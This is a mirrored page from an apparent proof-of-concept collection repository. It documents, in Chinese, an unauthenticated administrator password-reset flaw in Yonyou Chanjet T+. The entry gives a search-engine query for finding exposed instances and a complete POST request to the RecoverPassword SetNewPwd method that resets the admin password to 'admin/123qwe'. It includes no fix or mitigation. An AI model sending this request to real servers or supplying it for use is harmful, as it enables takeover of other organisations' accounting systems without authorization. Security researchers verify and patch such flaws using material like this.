admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

33 lines
676 B
Markdown
Raw Blame History

# 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
## 漏洞描述
用友 畅捷通T+ RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过漏洞修改管理员账号密码登录后台
## 漏洞影响
```
用友 畅捷通T+
```
## 网络测绘
```
app="畅捷通-TPlus"
```
## 漏洞复现
登录页面
![image-20220909104559292](images/202209091048224.png)
验证POC, 重置账号密码为 `admin/123qwe`
```
POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}
```
![image-20220909104816391](images/202209091048450.png)
Reference in New Issue View Git Blame Copy Permalink